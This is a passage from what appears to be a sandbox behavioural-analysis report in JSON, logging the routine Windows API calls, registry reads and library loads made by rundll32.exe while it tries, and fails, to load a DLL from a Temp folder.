},
{
"name": "ValueName",
"value": "PreferExternalManifest"
},
{
"name": "FullName",
"value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest"
}
],
"repeated": 0,
"id": 47
},
{
"timestamp": "2025-11-15 16:47:16,295",
"thread_id": "3260",
"caller": "0x00965a5f",
"parentcaller": "0x009642a3",
"category": "system",
"api": "NtClose",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "Handle",
"value": "0x000002a0"
}
],
"repeated": 0,
"id": 48
},
{
"timestamp": "2025-11-15 16:47:16,295",
"thread_id": "3260",
"caller": "0x00965a5f",
"parentcaller": "0x009642a3",
"category": "__notification__",
"api": "sysenter",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "ThreadIdentifier",
"value": "3260"
},
{
"name": "Module",
"value": "KERNEL32.DLL"
},
{
"name": "Return Address",
"value": "0x76352b4c"
}
],
"repeated": 0,
"id": 49
},
{
"timestamp": "2025-11-15 16:47:16,295",
"thread_id": "3260",
"caller": "0x00965a5f",
"parentcaller": "0x009642a3",
"category": "system",
"api": "NtClose",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "Handle",
"value": "0x000002a8"
}
],
"repeated": 0,
"id": 50
},
{
"timestamp": "2025-11-15 16:47:16,295",
"thread_id": "3260",
"caller": "0x00965a5f",
"parentcaller": "0x009642a3",
"category": "system",
"api": "NtClose",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "Handle",
"value": "0x000002a4"
}
],
"repeated": 0,
"id": 51
},
{
"timestamp": "2025-11-15 16:47:16,295",
"thread_id": "3260",
"caller": "0x00965a5f",
"parentcaller": "0x009642a3",
"category": "process",
"api": "NtUnmapViewOfSection",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "ProcessHandle",
"value": "0xffffffff"
},
{
"name": "BaseAddress",
"value": "0x00930000"
},
{
"name": "RegionSize",
"value": "0x00010000"
}
],
"repeated": 0,
"id": 52
},
{
"timestamp": "2025-11-15 16:47:16,295",
"thread_id": "3260",
"caller": "0x00965d94",
"parentcaller": "0x009642ae",
"category": "process",
"api": "NtOpenProcessToken",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "ProcessHandle",
"value": "0xffffffff"
},
{
"name": "DesiredAccess",
"value": "0x00000008"
},
{
"name": "TokenHandle",
"value": "0x000002a4"
}
],
"repeated": 0,
"id": 53
},
{
"timestamp": "2025-11-15 16:47:16,295",
"thread_id": "3260",
"caller": "0x00965d1d",
"parentcaller": "0x00965db9",
"category": "process",
"api": "NtQueryInformationToken",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "TokenInformationClass",
"value": "18"
},
{
"name": "TokenInformation",
"value": "\\x02\\x00\\x00\\x00"
}
],
"repeated": 0,
"id": 54
},
{
"timestamp": "2025-11-15 16:47:16,295",
"thread_id": "3260",
"caller": "0x00965dc4",
"parentcaller": "0x009642ae",
"category": "system",
"api": "NtClose",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "Handle",
"value": "0x000002a4"
}
],
"repeated": 0,
"id": 55
},
{
"timestamp": "2025-11-15 16:47:16,310",
"thread_id": "3260",
"caller": "0x00963c8d",
"parentcaller": "0x00963e97",
"category": "__notification__",
"api": "sysenter",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "ThreadIdentifier",
"value": "3260"
},
{
"name": "Module",
"value": "KERNEL32.DLL"
},
{
"name": "Return Address",
"value": "0x76352b4c"
}
],
"repeated": 0,
"id": 56
},
{
"timestamp": "2025-11-15 16:47:16,310",
"thread_id": "3260",
"caller": "0x00963c8d",
"parentcaller": "0x00963e97",
"category": "system",
"api": "LdrLoadDll",
"status": false,
"return": "0xffffffffc0000135",
"pretty_return": "DLL_NOT_FOUND",
"arguments": [
{
"name": "Flags",
"value": "0x00000000"
},
{
"name": "FileName",
"value": "C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll"
},
{
"name": "BaseAddress",
"value": "0x00000000"
}
],
"repeated": 0,
"id": 57
},
{
"timestamp": "2025-11-15 16:47:16,310",
"thread_id": "3260",
"caller": "0x00963cf8",
"parentcaller": "0x00963e97",
"category": "registry",
"api": "NtOpenKey",
"status": false,
"return": "0xffffffffc0000034",
"pretty_return": "OBJECT_NAME_NOT_FOUND",
"arguments": [
{
"name": "KeyHandle",
"value": "0x00000000"
},
{
"name": "DesiredAccess",
"value": "0x00020019",
"pretty_value": "KEY_READ"
},
{
"name": "ObjectAttributesHandle",
"value": "0x00000000"
},
{
"name": "ObjectAttributesName",
"value": "\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\en-US"
},
{
"name": "ObjectAttributes",
"value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\en-US"
}
],
"repeated": 0,
"id": 58
},
{
"timestamp": "2025-11-15 16:47:16,310",
"thread_id": "3260",
"caller": "0x00963cf8",
"parentcaller": "0x00963e97",
"category": "filesystem",
"api": "NtOpenFile",
"status": false,
"return": "0xffffffffc0000034",
"pretty_return": "OBJECT_NAME_NOT_FOUND",
"arguments": [
{
"name": "FileHandle",
"value": "0x00000000"
},
{
"name": "DesiredAccess",
"value": "0x00100001",
"pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE"
},
{
"name": "FileName",
"value": "C:\\Windows\\System32\\en-US\\KERNELBASE.dll.mui"
},
{
"name": "ShareAccess",
"value": "5",
"pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
}
],
"repeated": 0,
"id": 59
},
{
"timestamp": "2025-11-15 16:47:16,310",
"thread_id": "3260",
"caller": "0x00963cf8",
"parentcaller": "0x00963e97",
"category": "filesystem",
"api": "NtOpenFile",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "FileHandle",
"value": "0x000002a4"
},
{
"name": "DesiredAccess",
"value": "0x00100001",
"pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE"
},
{
"name": "FileName",
"value": "C:\\Windows\\sysnative\\en-US\\KERNELBASE.dll.mui"
},
{
"name": "ShareAccess",
"value": "5",
"pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
}
],
"repeated": 0,
"id": 60
},
{
"timestamp": "2025-11-15 16:47:16,310",
"thread_id": "3260",
"caller": "0x00963cf8",
"parentcaller": "0x00963e97",
"category": "process",
"api": "NtCreateSection",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "SectionHandle",
"value": "0x000002a8"
},
{
"name": "DesiredAccess",
"value": "0x000f0005",
"pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ"
},
{
"name": "ObjectAttributes",
"value": ""
},
{
"name": "FileHandle",
"value": "0x000002a4"
},
{
"name": "FileName",
"value": "C:\\Windows\\sysnative\\en-US\\KernelBase.dll.mui"
}
],
"repeated": 0,
"id": 61
},
{
"timestamp": "2025-11-15 16:47:16,310",
"thread_id": "3260",
"caller": "0x00963cf8",
"parentcaller": "0x00963e97",
"category": "process",
"api": "NtMapViewOfSection",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "SectionHandle",
"value": "0x000002a8"
},
{
"name": "ProcessHandle",
"value": "0xffffffff"
},
{
"name": "BaseAddress",
"value": "0x064d0000"
},
{
"name": "SectionOffset",
"value": "0x0049ea20"
},
{
"name": "ViewSize",
"value": "0x00140000"
},
{
"name": "Win32Protect",
"value": "0x00000002",
"pretty_value": "PAGE_READONLY"
},
{
"name": "StackPivoted",
"value": "no"
}
],
"repeated": 0,
"id": 62
},
{
"timestamp": "2025-11-15 16:47:16,310",
"thread_id": "3260",
"caller": "0x00963cf8",
"parentcaller": "0x00963e97",
"category": "system",
"api": "NtClose",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "Handle",
"value": "0x000002a8"
}
],
"repeated": 0,
"id": 63
},
{
"timestamp": "2025-11-15 16:47:16,310",
"thread_id": "3260",
"caller": "0x00963924",
"parentcaller": "0x00963d10",
"category": "process",
"api": "NtUnmapViewOfSection",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "ProcessHandle",
"value": "0xffffffff"
},
{
"name": "BaseAddress",
"value": "0x005e0000"
},
{
"name": "RegionSize",
"value": "0x00001000"
}
],
"repeated": 0,
"id": 64
},
{
"timestamp": "2025-11-15 16:47:16,310",
"thread_id": "3260",
"caller": "0x00963924",
"parentcaller": "0x00963d10",
"category": "system",
"api": "NtClose",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "Handle",
"value": "0x000000e8"
}
],
"repeated": 0,
"id": 65
},
{
"timestamp": "2025-11-15 16:47:16,310",
"thread_id": "3260",
"caller": "0x00963924",
"parentcaller": "0x00963d10",
"category": "registry",
"api": "NtOpenKey",
"status": false,
"return": "0xffffffffc0000034",
"pretty_return": "OBJECT_NAME_NOT_FOUND",
"arguments": [
{
"name": "KeyHandle",
"value": "0x00000000"
},
{
"name": "DesiredAccess",
"value": "0x00020019",
"pretty_value": "KEY_READ"
},
{
"name": "ObjectAttributesHandle",
"value": "0x00000000"
},
{
"name": "ObjectAttributesName",
"value": "\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\en-US"
},
{
"name": "ObjectAttributes",
"value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\en-US"
}
],
"repeated": 0,
"id": 66
},
{
"timestamp": "2025-11-15 16:47:16,310",
"thread_id": "3260",
"caller": "0x00963924",
"parentcaller": "0x00963d10",
"category": "filesystem",
"api": "NtOpenFile",
"status": false,
"return": "0xffffffffc0000034",
"pretty_return": "OBJECT_NAME_NOT_FOUND",
"arguments": [
{
"name": "FileHandle",
"value": "0x00000000"
},
{
"name": "DesiredAccess",
"value": "0x00100001",
"pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE"
},
{
"name": "FileName",
"value": "C:\\Windows\\SysWOW64\\en-US\\rundll32.exe.mui"
},
{
"name": "ShareAccess",
"value": "5",
"pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
}
],
"repeated": 0,
"id": 67
},
{
"timestamp": "2025-11-15 16:47:16,310",
"thread_id": "3260",
"caller": "0x00963924",
"parentcaller": "0x00963d10",
"category": "filesystem",
"api": "NtOpenFile",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "FileHandle",
"value": "0x000000e8"
},
{
"name": "DesiredAccess",
"value": "0x00100001",
"pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE"
},
{
"name": "FileName",
"value": "C:\\Windows\\sysnative\\en-US\\rundll32.exe.mui"
},
{
"name": "ShareAccess",
"value": "5",
"pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
}
],
"repeated": 0,
"id": 68
},
{
"timestamp": "2025-11-15 16:47:16,310",
"thread_id": "3260",
"caller": "0x00963924",
"parentcaller": "0x00963d10",
"category": "process",
"api": "NtCreateSection",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "SectionHandle",
"value": "0x000002a8"
},
{
"name": "DesiredAccess",
"value": "0x000f0005",
"pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ"
},
{
"name": "ObjectAttributes",
"value": ""
},
{
"name": "FileHandle",
"value": "0x000000e8"
},
{
"name": "FileName",
"value": "C:\\Windows\\sysnative\\en-US\\rundll32.exe.mui"
}
],
"repeated": 0,
"id": 69
},
{
"timestamp": "2025-11-15 16:47:16,310",
"thread_id": "3260",
"caller": "0x00963924",
"parentcaller": "0x00963d10",
"category": "process",
"api": "NtMapViewOfSection",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "SectionHandle",
"value": "0x000002a8"
},
{
"name": "ProcessHandle",
"value": "0xffffffff"
},
{
"name": "BaseAddress",
"value": "0x005e0000"
},
{
"name": "SectionOffset",
"value": "0x0049e500"
},
{
"name": "ViewSize",
"value": "0x00001000"
},
{
"name": "Win32Protect",
"value": "0x00000002",
"pretty_value": "PAGE_READONLY"
},
{
"name": "StackPivoted",
"value": "no"
}
],
"repeated": 0,
"id": 70
},
{
"timestamp": "2025-11-15 16:47:16,310",
"thread_id": "3260",
"caller": "0x00963924",
"parentcaller": "0x00963d10",
"category": "system",
"api": "NtClose",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "Handle",
"value": "0x000002a8"
}
],
"repeated": 0,
"id": 71
},
{
"timestamp": "2025-11-15 16:47:16,310",
"thread_id": "3260",
"caller": "0x00965e77",
"parentcaller": "0x009669af",
"category": "process",
"api": "NtProtectVirtualMemory",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "ProcessHandle",
"value": "0xffffffff"
},
{
"name": "BaseAddress",
"value": "0x0096b000"
},
{
"name": "ModuleName",
"value": "rundll32.exe"
},
{
"name": "NumberOfBytesProtected",
"value": "0x00001000"
},
{
"name": "MemoryType",
"value": "0x00000000"
},
{
"name": "NewAccessProtection",
"value": "0x00000004",
"pretty_value": "PAGE_READWRITE"
},
{
"name": "OldAccessProtection",
"value": "0x00000002",
"pretty_value": "PAGE_READONLY"
},
{
"name": "StackPivoted",
"value": "no"
}
],
"repeated": 0,
"id": 72
},
{
"timestamp": "2025-11-15 16:47:16,310",
"thread_id": "3260",
"caller": "0x00965e77",
"parentcaller": "0x009669af",
"category": "process",
"api": "NtProtectVirtualMemory",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "ProcessHandle",
"value": "0xffffffff"
},
{
"name": "BaseAddress",
"value": "0x0096b000"
},
{
"name": "ModuleName",
"value": "rundll32.exe"
},
{
"name": "NumberOfBytesProtected",
"value": "0x00001000"
},
{
"name": "MemoryType",
"value": "0x00000000"
},
{
"name": "NewAccessProtection",
"value": "0x00000002",
"pretty_value": "PAGE_READONLY"
},
{
"name": "OldAccessProtection",
"value": "0x00000004",
"pretty_value": "PAGE_READWRITE"
},
{
"name": "StackPivoted",
"value": "no"
}
],
"repeated": 0,
"id": 73
},
{
"timestamp": "2025-11-15 16:47:16,326",
"thread_id": "3260",
"caller": "0x00963a40",
"parentcaller": "0x00963d10",
"category": "__notification__",
"api": "sysenter",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "ThreadIdentifier",
"value": "3260"
},
{
"name": "Module",
"value": "KERNELBASE.dll"
},
{
"name": "Return Address",
"value": "0x7607413c"
}
],
"repeated": 0,
"id": 74
},
{
"timestamp": "2025-11-15 16:47:16,482",
"thread_id": "3260",
"caller": "0x00963a40",
"parentcaller": "0x00963d10",
"category": "system",
"api": "DllLoadNotification",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "NotificationReason",
"value": "load"
},
{
"name": "DllName",
"value": "C:\\Windows\\SYSTEM32\\TextShaping"
},
{
"name": "DllBase",
"value": "0x730a0000"
}
],
"repeated": 0,
"id": 75
},
{
"timestamp": "2025-11-15 16:47:16,498",
"thread_id": "3260",
"caller": "0x00963a40",
"parentcaller": "0x00963d10",
"category": "system",
"api": "DllLoadNotification",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "NotificationReason",
"value": "load"
},
{
"name": "DllName",
"value": "C:\\Windows\\system32\\uxtheme"
},
{
"name": "DllBase",
"value": "0x73ae0000"
}
],
"repeated": 0,
"id": 76
},
{
"timestamp": "2025-11-15 16:47:16,513",
"thread_id": "3260",
"caller": "0x00963a40",
"parentcaller": "0x00963d10",
"category": "system",
"api": "LdrLoadDll",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "Flags",
"value": "0x00000000"
},
{
"name": "FileName",
"value": "C:\\Windows\\System32\\uxtheme.dll"
},
{
"name": "BaseAddress",
"value": "0x73ae0000"
}
],
"repeated": 0,
"id": 77
},
{
"timestamp": "2025-11-15 16:47:16,513",
"thread_id": "3260",
"caller": "0x00963a40",
"parentcaller": "0x00963d10",
"category": "system",
"api": "DllLoadNotification",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "NotificationReason",
"value": "load"
},
{
"name": "DllName",
"value": "C:\\Windows\\System32\\MSCTF"
},
{
"name": "DllBase",
"value": "0x76620000"
}
],
"repeated": 0,
"id": 78
},
{
"timestamp": "2025-11-15 16:47:16,529",
"thread_id": "3260",
"caller": "0x00963a40",
"parentcaller": "0x00963d10",
"category": "system",
"api": "DllLoadNotification",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "NotificationReason",
"value": "load"
},
{
"name": "DllName",
"value": "C:\\Windows\\SYSTEM32\\kernel.appcore"
},
{
"name": "DllBase",
"value": "0x74e50000"
}
],
"repeated": 0,
"id": 79
},
{
"timestamp": "2025-11-15 16:47:16,576",
"thread_id": "3260",
"caller": "0x00963a40",
"parentcaller": "0x00963d10",
"category": "system",
"api": "DllLoadNotification",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "NotificationReason",
"value": "load"
},
{
"name": "DllName",
"value": "C:\\Windows\\System32\\bcryptPrimitives"
},
{
"name": "DllBase",
"value": "0x75e60000"
}
],
"repeated": 0,
"id": 80
},
{
"timestamp": "2025-11-15 16:47:16,576",
"thread_id": "3260",
"caller": "0x00963a40",
"parentcaller": "0x00963d10",
"category": "system",
"api": "DllLoadNotification",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "NotificationReason",
"value": "load"
},
{
"name": "DllName",
"value": "C:\\Windows\\SYSTEM32\\ntmarta"
},
{
"name": "DllBase",
"value": "0x73f80000"
}
],
"repeated": 0,
"id": 81
},
{
"timestamp": "2025-11-15 16:47:16,576",
"thread_id": "3260",
"caller": "0x00963a40",
"parentcaller": "0x00963d10",
"category": "system",
"api": "DllLoadNotification",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "NotificationReason",
"value": "load"
},
{
"name": "DllName",
"value": "C:\\Windows\\System32\\CoreMessaging"
},
{
"name": "DllBase",
"value": "0x71e40000"
}
],
"repeated": 0,
"id": 82
},
{
"timestamp": "2025-11-15 16:47:16,576",
"thread_id": "3260",
"caller": "0x00963a40",
"parentcaller": "0x00963d10",
"category": "system",
"api": "DllLoadNotification",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "NotificationReason",
"value": "load"
},
{
"name": "DllName",
"value": "C:\\Windows\\SYSTEM32\\wintypes"
},
{
"name": "DllBase",
"value": "0x72eb0000"
}
],
"repeated": 0,
"id": 83
},
{
"timestamp": "2025-11-15 16:47:16,591",
"thread_id": "3260",
"caller": "0x00963a40",
"parentcaller": "0x00963d10",
"category": "system",
"api": "DllLoadNotification",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "NotificationReason",
"value": "load"
},
{
"name": "DllName",
"value": "C:\\Windows\\System32\\CoreUIComponents"
},
{
"name": "DllBase",
"value": "0x71ee0000"
}
],
"repeated": 0,
"id": 84
},
{
"timestamp": "2025-11-15 16:47:16,591",
"thread_id": "3260",
"caller": "0x00963a40",
"parentcaller": "0x00963d10",
"category": "system",
"api": "DllLoadNotification",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "NotificationReason",
"value": "load"
},
{
"name": "DllName",
"value": "C:\\Windows\\SYSTEM32\\textinputframework"
},
{
"name": "DllBase",
"value": "0x72160000"
}
],
"repeated": 0,
"id": 85
},
{
"timestamp": "2025-11-15 16:47:16,591",
"thread_id": "3260",
"caller": "0x00963a40",
"parentcaller": "0x00963d10",
"category": "system",
"api": "LdrLoadDll",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "Flags",
"value": "0x00000000"
},
{
"name": "FileName",
"value": "kernel32.dll"
},
{
"name": "BaseAddress",
"value": "0x76330000"
}
],
"repeated": 0,
"id": 86
},
{
"timestamp": "2025-11-15 16:47:41,576",
"thread_id": "4040",
"caller": "0x77a264c6",
"parentcaller": "0x77a263d1",
"category": "threading",
"api": "NtTestAlert",
"status": true,
"return": "0x00000000",
"arguments": [],
"repeated": 0,
"id": 87
},
{
"timestamp": "2025-11-15 16:47:46,591",
"thread_id": "4040",
"caller": "0x76057924",
"parentcaller": "0x76fac105",
"category": "system",
"api": "NtDuplicateObject",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "SourceProcessHandle",
"value": "0xffffffff"
},
{
"name": "SourceHandle",
"value": "0xfffffffe"
},
{
"name": "TargetProcessHandle",
"value": "0xffffffff"
},
{
"name": "TargetHandle",
"value": "0x0000033c"
},
{
"name": "Options",
"value": "0x00000002"
}
],
"repeated": 0,
"id": 88
},
{
"timestamp": "2025-11-15 16:47:46,591",
"thread_id": "4040",
"caller": "0x76facf78",
"parentcaller": "0x76face2d",
"category": "system",
"api": "NtClose",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "Handle",
"value": "0x000002f0"
}
],
"repeated": 0,
"id": 89
},
{
"timestamp": "2025-11-15 16:47:46,591",
"thread_id": "6900",
"caller": "0x77a264c6",
"parentcaller": "0x77a263d1",
"category": "threading",
"api": "NtTestAlert",
"status": true,
"return": "0x00000000",
"arguments": [],
"repeated": 0,
"id": 90
},
{
"timestamp": "2025-11-15 16:48:15,857",
"thread_id": "3928",
"caller": "0x77a2b596",
"parentcaller": "0x779f60ac",
"category": "threading",
"api": "NtQueryInformationThread",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "ThreadHandle",
"value": "0xfffffffe"
},
{
"name": "ThreadInformationClass",
"value": "12"
},
{
"name": "ThreadInformation",
"value": "\\x00\\x00\\x00\\x00"
},
{
"name": "ThreadId",
"value": "3928"
}
],
"repeated": 0,
"id": 91
},
{
"timestamp": "2025-11-15 16:48:15,857",
"thread_id": "3928",
"caller": "0x77a2b5b9",
"parentcaller": "0x779f60ac",
"category": "threading",
"api": "NtTerminateThread",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "ThreadHandle",
"value": "0x00000000"
},
{
"name": "ExitStatus",
"value": "0x00000000"
},
{
"name": "ThreadId",
"value": "0"
},
{
"name": "ProcessId",
"value": "0"
}
],
"repeated": 0,
"id": 92
},
{
"timestamp": "2025-11-15 16:49:29,826",
"thread_id": "6900",
"caller": "0x77a2b596",
"parentcaller": "0x779f60ac",
"category": "threading",
"api": "NtQueryInformationThread",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "ThreadHandle",
"value": "0xfffffffe"
},
{
"name": "ThreadInformationClass",
"value": "12"
},
{
"name": "ThreadInformation",
"value": "\\x00\\x00\\x00\\x00"
},
{
"name": "ThreadId",
"value": "6900"
}
],
"repeated": 0,
"id": 93
},
{
"timestamp": "2025-11-15 16:49:29,826",
"thread_id": "6900",
"caller": "0x77a2b5b9",
"parentcaller": "0x779f60ac",
"category": "threading",
"api": "NtTerminateThread",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "ThreadHandle",
"value": "0x00000000"
},
{
"name": "ExitStatus",
"value": "0x00000000"
},
{
"name": "ThreadId",
"value": "0"
},
{
"name": "ProcessId",
"value": "0"
}
],
"repeated": 0,
"id": 94
},
{
"timestamp": "2025-11-15 16:49:29,826",
"thread_id": "4040",
"caller": "0x77a2b596",
"parentcaller": "0x779f60ac",
"category": "threading",
"api": "NtQueryInformationThread",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "ThreadHandle",
"value": "0xfffffffe"
},
{
"name": "ThreadInformationClass",
"value": "12"
},
{
"name": "ThreadInformation",
"value": "\\x00\\x00\\x00\\x00"
},
{
"name": "ThreadId",
"value": "4040"
}
],
"repeated": 0,
"id": 95
},
{
"timestamp": "2025-11-15 16:49:29,826",
"thread_id": "4040",
"caller": "0x76048b4a",
"parentcaller": "0x76fcda84",
"category": "system",
"api": "NtClose",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "Handle",
"value": "0x0000033c"
}
],
"repeated": 0,
"id": 96
},
{
"timestamp": "2025-11-15 16:49:29,826",
"thread_id": "4040",
"caller": "0x76048b4a",
"parentcaller": "0x76fcdb06",
"category": "system",
"api": "NtClose",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "Handle",
"value": "0x00000338"
}
],
"repeated": 0,
"id": 97
},
{
"timestamp": "2025-11-15 16:49:29,826",
"thread_id": "4040",
"caller": "0x77a2b5b9",
"parentcaller": "0x779f60ac",
"category": "threading",
"api": "NtTerminateThread",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "ThreadHandle",
"value": "0x00000000"
},
{
"name": "ExitStatus",
"value": "0x00000000"
},
{
"name": "ThreadId",
"value": "0"
},
{
"name": "ProcessId",
"value": "0"
}
],
"repeated": 0,
"id": 98
}
],
"threads": [
"3260",
"6220",
"7476",
"4040",
"6900",
"3928"
],
"environ": {
"UserName": "apogean",
"ComputerName": "DESKTOP-B6KVMU7",
"WindowsPath": "C:\\Windows",
"TempPath": "C:\\Users\\apogean\\AppData\\Local\\Temp\\",
"CommandLine": "\"C:\\Windows\\System32\\rundll32.exe\" \"C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll\",#1",
"RegisteredOwner": "",
"RegisteredOrganization": "",
"ProductName": "",
"SystemVolumeSerialNumber": "9e1a-68e8",
"SystemVolumeGUID": "3199a954-0000-0000-0000-300300000000",
"MachineGUID": "",
"MainExeBase": "0x00960000",
"MainExeSize": "0x00014000",
"Bitness": "32-bit"
},
"file_activities": {
"read_files": [],
"write_files": [],
"delete_files": []
}
}
],
"anomaly": [],
"processtree": [
{
"name": "rundll32.exe",
"pid": 1052,
"parent_id": 7528,
"module_path": "C:\\Windows\\SysWOW64\\rundll32.exe",
"children": [],
"threads": [
"3260",
"6220",
"7476",
"4040",
"6900",
"3928"
],
"environ": {
"UserName": "apogean",
"ComputerName": "DESKTOP-B6KVMU7",
"WindowsPath": "C:\\Windows",
"TempPath": "C:\\Users\\apogean\\AppData\\Local\\Temp\\",
"CommandLine": "\"C:\\Windows\\System32\\rundll32.exe\" \"C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll\",#1",
"RegisteredOwner": "",
"RegisteredOrganization": "",
"ProductName": "",
"SystemVolumeSerialNumber": "9e1a-68e8",
"SystemVolumeGUID": "3199a954-0000-0000-0000-300300000000",
"MachineGUID": "",
"MainExeBase": "0x00960000",
"MainExeSize": "0x00014000",
"Bitness": "32-bit"
}
}
],
"summary": {
"files": [
"C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll.manifest",
"C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll",
"C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll.123.Manifest",
"C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll.124.Manifest",
"C:\\Windows\\System32\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\sysnative\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\SysWOW64\\en-US\\rundll32.exe.mui",
"C:\\Windows\\sysnative\\en-US\\rundll32.exe.mui"
],
"read_files": [],
"write_files": [],
"delete_files": [],
"keys": [
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\en-US"
],
"read_keys": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest"
],
"write_keys": [],
"delete_keys": [],
"executed_commands": [],
"resolved_apis": [],
"mutexes": [],
"created_services": [],
"started_services": []
},
"enhanced": [
{
"event": "read",
"object": "registry",
"timestamp": "2025-11-15 16:47:16,279",
"eid": 1,
"data": {
"regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest",
"content": null
}
},
{
"event": "read",
"object": "registry",
"timestamp": "2025-11-15 16:47:16,279",
"eid": 2,
"data": {
"regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest",
"content": null
}
},
{
"event": "read",
"object": "registry",
"timestamp": "2025-11-15 16:47:16,295",
"eid": 3,
"data": {
"regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest",
"content": null
}
},
{
"event": "load",
"object": "library",
"timestamp": "2025-11-15 16:47:16,310",
"eid": 4,
"data": {
"file": "C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll",
"pathtofile": null,
"moduleaddress": "0x00000000"
}
},
{
"event": "load",
"object": "library",
"timestamp": "2025-11-15 16:47:16,513",
"eid": 5,
"data": {
"file": "C:\\Windows\\System32\\uxtheme.dll",
"pathtofile": null,
"moduleaddress": "0x73ae0000"
}
},
{
"event": "load",
"object": "library",
"timestamp": "2025-11-15 16:47:16,591",
"eid": 6,
"data": {
"file": "kernel32.dll",
"pathtofile": null,
"moduleaddress": "0x76330000"
}
}
],
"encryptedbuffers": []
}
|
{
